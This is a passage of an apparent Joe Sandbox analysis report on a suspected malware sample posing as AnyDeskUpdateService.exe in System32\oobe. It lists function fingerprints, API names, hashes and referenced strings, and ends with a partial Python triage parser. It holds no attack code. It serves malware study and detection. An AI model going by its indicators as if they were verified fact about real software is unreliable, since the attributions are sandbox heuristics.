                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Event$Source$DeregisterErrorLastRegisterReport
                                                                                                      • String ID: %s failed with %d$AnyDeskUpdateService$AnyDeskUpdateService
                                                                                                      • API String ID: 544316925-1586499718
                                                                                                      • Opcode ID: 3d5dde09e4f0c9a8635dc3b2002a576137b068c398dccda7d93cadec4662d94b
                                                                                                      • Instruction ID: 46200e796e60df4242b38f2109495df45f986ee354865e289defca70c5cc4d3e
                                                                                                      • Opcode Fuzzy Hash: 3d5dde09e4f0c9a8635dc3b2002a576137b068c398dccda7d93cadec4662d94b
                                                                                                      • Instruction Fuzzy Hash: D0112C3161CF8986EB659B54F4513AAB3A0FB887A4F80013AEACD43B54EF7CD1488F50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: f$p$p
                                                                                                      • API String ID: 3215553584-1995029353
                                                                                                      • Opcode ID: a2d7795b7d04fa7270e565260d41ff3577274ae9c7a6f098e1df81c8233e13d8
                                                                                                      • Instruction ID: 8600b965a620a0c9bc1de3dde5cacbc288ec77a428bea7bc87d50a321d0f19ac
                                                                                                      • Opcode Fuzzy Hash: a2d7795b7d04fa7270e565260d41ff3577274ae9c7a6f098e1df81c8233e13d8
                                                                                                      • Instruction Fuzzy Hash: 4712C326E0D94B86FB207A55D15427AF691EB40F60FC4C137E6C9467C4EB3CEA888F25
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 1386471777-1405518554
                                                                                                      • Opcode ID: 2fb573258588d9a0732103de3035a81878e4e8febdd76704b08a3a214b084dd1
                                                                                                      • Instruction ID: 005ef8afadd09991c129acc01a159d375c5dc4a2446a470794487e9a259acea6
                                                                                                      • Opcode Fuzzy Hash: 2fb573258588d9a0732103de3035a81878e4e8febdd76704b08a3a214b084dd1
                                                                                                      • Instruction Fuzzy Hash: 53519A22B0DB458AFB15EBB0D4902BC7371AF44758F844136DF8D26A56EF38E55AC720
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                      • Opcode ID: d6d876a61148c08aaa09cadfa9bfd10722785b3aceef806c8e2bf92c7e5e0abf
                                                                                                      • Instruction ID: 4810d9355caf67f6f5ea063bae7a6edddd992364e836ef572e25be99abc9d68b
                                                                                                      • Opcode Fuzzy Hash: d6d876a61148c08aaa09cadfa9bfd10722785b3aceef806c8e2bf92c7e5e0abf
                                                                                                      • Instruction Fuzzy Hash: 7D310721B1EF5981EE16BB46A800675A395BF04BB1FD90536DD9E07390FF3CE4888B60
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: 150489296217e134fac2ce95dd32539a7224101ed53f0799fee9b0db1a451bf2
                                                                                                      • Instruction ID: bbb9f207c51f0396e055922067c3d05c454bd906a5f730fc9d2765eccbf090a2
                                                                                                      • Opcode Fuzzy Hash: 150489296217e134fac2ce95dd32539a7224101ed53f0799fee9b0db1a451bf2
                                                                                                      • Instruction Fuzzy Hash: 3111B421A1CF5582E750AB56E854329A6A0FB89BF4F804235E99D83790EF7CD5188B50
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID:
                                                                                                      • API String ID: 2081738530-0
                                                                                                      • Opcode ID: 0117289e98df00da582755afb24c31f3f504ef9a4471fb3c4949e3d48aaf6a78
                                                                                                      • Instruction ID: c91798e06cfaf60c27d4a78e1a217fe7027b0b7277a9f72aa19169638f5bb25a
                                                                                                      • Opcode Fuzzy Hash: 0117289e98df00da582755afb24c31f3f504ef9a4471fb3c4949e3d48aaf6a78
                                                                                                      • Instruction Fuzzy Hash: 4B316325A0CE4985EA19BB55E850179A752FB457B0FD80233DA9D03295FE3DF449CB20
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID:
                                                                                                      • API String ID: 2081738530-0
                                                                                                      • Opcode ID: 3c0f3d2b7e2db67fea3719f7c25c5b52825845983d8d7121c0e12f2b9b1ab6b5
                                                                                                      • Instruction ID: 260bedd8915162a9243ea8ac2e4728f45535e27f3c4b14d2f1c88dcab77cfc12
                                                                                                      • Opcode Fuzzy Hash: 3c0f3d2b7e2db67fea3719f7c25c5b52825845983d8d7121c0e12f2b9b1ab6b5
                                                                                                      • Instruction Fuzzy Hash: 54316121A4CE4A85EE19BB55E850179E362FB45BB4FC81133DA9D032A5FE3DF449CB20
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID:
                                                                                                      • API String ID: 2081738530-0
Similarity
• API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 3523768491-393685449
Similarity
• API ID: Concurrency::cancel_current_task
• String ID: false$true
• API String ID: 118556049-2658103896
Similarity
• API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2967684691-1405518554
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF71DDA471B,?,?,00000000,00007FF71DDA49B6,?,?,?,?,?,00007FF71DDA4942), ref: 00007FF71DDAADDF
• FlsSetValue.KERNEL32(?,?,?,00007FF71DDA471B,?,?,00000000,00007FF71DDA49B6,?,?,?,?,?,00007FF71DDA4942), ref: 00007FF71DDAADFE
• FlsSetValue.KERNEL32(?,?,?,00007FF71DDA471B,?,?,00000000,00007FF71DDA49B6,?,?,?,?,?,00007FF71DDA4942), ref: 00007FF71DDAAE26
• FlsSetValue.KERNEL32(?,?,?,00007FF71DDA471B,?,?,00000000,00007FF71DDA49B6,?,?,?,?,?,00007FF71DDA4942), ref: 00007FF71DDAAE37
• FlsSetValue.KERNEL32(?,?,?,00007FF71DDA471B,?,?,00000000,00007FF71DDA49B6,?,?,?,?,?,00007FF71DDA4942), ref: 00007FF71DDAAE48
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
Similarity
• API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2775327233-1405518554
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                      • Opcode ID: c0416db31ead1b90ad17fdb051eb07fe199fd48def58b7b7f5e660e329d7bcf7
                                                                                                      • Instruction ID: 67bea48a581e5308573235d887f3bb36c755b039ff3024cc3cad7798caa90a45
                                                                                                      • Opcode Fuzzy Hash: c0416db31ead1b90ad17fdb051eb07fe199fd48def58b7b7f5e660e329d7bcf7
                                                                                                      • Instruction Fuzzy Hash: 8C41BE32B0EA0599EB18EFB0D4502EC7375EF44B18F844036DA8C27A56EE39D4198768
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 2718003287-0
                                                                                                      • Opcode ID: f4985b051c93d1ffe9d611e842d6d6136a1aebebfe2613dad447161918752a3f
                                                                                                      • Instruction ID: 8514fc8bd6584572140630c47fe27ec9ec4638d46dbc2fd3a60bb07f10b1ff6d
                                                                                                      • Opcode Fuzzy Hash: f4985b051c93d1ffe9d611e842d6d6136a1aebebfe2613dad447161918752a3f
                                                                                                      • Instruction Fuzzy Hash: D2D1F536B0CA8589E711DFA9C4405AC7771FB44BA8F848136CE9D97B99EE38D40ACB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CodeInfoPageValid
                                                                                                      • String ID: COMSPEC
                                                                                                      • API String ID: 546120528-1631433037
                                                                                                      • Opcode ID: 46c349e5193ee86d75655e4a574d5ad4ddb955498f1696478ddccb8521d54604
                                                                                                      • Instruction ID: a384af833afde09a941f79590c86cfc8754d5edba4feffe924ff9d73f1758c99
                                                                                                      • Opcode Fuzzy Hash: 46c349e5193ee86d75655e4a574d5ad4ddb955498f1696478ddccb8521d54604
                                                                                                      • Instruction Fuzzy Hash: 6E81F662E0CE8A66E764EF559050179F7A1EB02768FC84037C6CE47690EE3CF6499B20
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 1467352782-3733052814
                                                                                                      • Opcode ID: 1ef23a5464c2794de408efda5d84bcc14a94eddb4dc116ddde8cda1a9e36996f
                                                                                                      • Instruction ID: b289f06c215bd3ee2caf10dec1d4d7fcca0d997900a1f3ff3995395151baf8cb
                                                                                                      • Opcode Fuzzy Hash: 1ef23a5464c2794de408efda5d84bcc14a94eddb4dc116ddde8cda1a9e36996f
                                                                                                      • Instruction Fuzzy Hash: EE71E57250CA8686DB349F25D08037DBB92EB04BA4F868136DECC07685EF2DD455CB50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2558813199-1018135373
                                                                                                      • Opcode ID: 635710ddb9ab94d1a55a8cd141b7dc412ae530ff3b0bfee5224db4b61107a7b5
                                                                                                      • Instruction ID: 319b0056d61f2572d9c09404a5b3b12d57eca92db5728503d6d1b3d39f12ed9a
                                                                                                      • Opcode Fuzzy Hash: 635710ddb9ab94d1a55a8cd141b7dc412ae530ff3b0bfee5224db4b61107a7b5
                                                                                                      • Instruction Fuzzy Hash: 0551613261CB4A86D624AF26E44026EB7B5F788BA0F501136EBCD07B55EF39E454CF10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                      • String ID: C:\Windows\System32\oobe\AnyDeskUpdateService.exe
                                                                                                      • API String ID: 3580290477-3169726793
                                                                                                      • Opcode ID: 015c39d85a576662478ad2c262c788667b722bdcede0a06fe6200da70104d747
                                                                                                      • Instruction ID: 98bb2407a4218898cd11ab362fb7c8b3f034a0040f6385a88d900c56d7833434
                                                                                                      • Opcode Fuzzy Hash: 015c39d85a576662478ad2c262c788667b722bdcede0a06fe6200da70104d747
                                                                                                      • Instruction Fuzzy Hash: 1741A532A0CF0A95EF15FF2194401BCA7A5EB45BA4BD58037ED8E43785EE3CE4498B20
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: 45453d0a4cb618e3adf22ee76669d7d8896708ec24ad589fac43c11eaffff017
                                                                                                      • Instruction ID: 745f38ab6538faaf7833654f4af52988b364c977a2651b39ea4791097b5a12de
                                                                                                      • Opcode Fuzzy Hash: 45453d0a4cb618e3adf22ee76669d7d8896708ec24ad589fac43c11eaffff017
                                                                                                      • Instruction Fuzzy Hash: 8C41A722B1CE4591DB10DF25E4443B9A7A1FB48BA4F858036EE8D87794EF3CD445CB50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: 1f17b112604c356c224eb2ed1e8f8d2ca513bdd1cb9f3ebf4d5e436a80b3cb1e
                                                                                                      • Instruction ID: f2d49836d20caf98b44b011c50ee682304328d971c054b7e07145f51026d3b3d
                                                                                                      • Opcode Fuzzy Hash: 1f17b112604c356c224eb2ed1e8f8d2ca513bdd1cb9f3ebf4d5e436a80b3cb1e
                                                                                                      • Instruction Fuzzy Hash: 5711373261CB8582EB259F15E40026AB7A5FB88B94F984236EACC47758EF3DC5558B00
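The function records above are only useful at scale if they can be parsed and triaged rather than read one by one. The following Python helper is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses records in the layout used above (each record opens with "APIs" and carries its fingerprint in the bullets under "Similarity"), flags functions whose referenced strings point at an executable under C:\Windows (here the dropped AnyDeskUpdateService.exe in System32\oobe) or resolve COMSPEC (the shell path used when a program spawns cmd.exe), and groups functions that share an API String ID across different Opcode IDs, as the two "bad locale name" records do. The sample input is constructed from values in the report and cut down to the lines the parser reads; the assumption that '$' separates several referenced strings (as in "csm$csm") is mine, not documented by the report.

```python
import re
from dataclasses import dataclass

# Constructed input: four function records from the report above, cut down to
# the lines this parser reads. In the report each record opens with "APIs" and
# carries its fingerprint in the bullets under "Similarity".
SAMPLE = """\
APIs
Similarity
• API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2775327233-1405518554
• Opcode ID: 9fcd7cb336c16f75f25f9420c924380d4a991d24cfce7f84e0b3057f1f7ebc5e
APIs
Similarity
• API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2775327233-1405518554
• Opcode ID: c0416db31ead1b90ad17fdb051eb07fe199fd48def58b7b7f5e660e329d7bcf7
APIs
Similarity
• API ID: CodeInfoPageValid
• String ID: COMSPEC
• API String ID: 546120528-1631433037
• Opcode ID: 46c349e5193ee86d75655e4a574d5ad4ddb955498f1696478ddccb8521d54604
APIs
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\\Windows\\System32\\oobe\\AnyDeskUpdateService.exe
• API String ID: 3580290477-3169726793
• Opcode ID: 015c39d85a576662478ad2c262c788667b722bdcede0a06fe6200da70104d747
"""

# Bullet lines look like "• Key: value". The key is letters and spaces only,
# so a value that itself contains ':' (a Windows path) is split at the right colon.
BULLET = re.compile(r"^[•*-]?\s*([A-Za-z ]+?):\s*(.*)$")
FIELDS = {"API ID": "api_id", "String ID": "string_id",
          "API String ID": "api_string_id", "Opcode ID": "opcode_id"}
WINDOWS_EXE = re.compile(r"^[A-Za-z]:\\Windows\\.*\.exe$", re.IGNORECASE)


@dataclass
class FunctionRecord:
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""

    @property
    def strings(self):
        # Assumption (not documented by the report): '$' separates several
        # referenced strings, as in "csm$csm".
        return [s for s in self.string_id.split("$") if s]


def parse_records(text):
    """Split report text into one FunctionRecord per 'APIs' block."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        m = BULLET.match(line)
        if current is not None and m and m.group(1) in FIELDS:
            setattr(current, FIELDS[m.group(1)], m.group(2).strip())
    return records


def triage(records):
    """Return (opcode_id, reason) for functions that reference an .exe under
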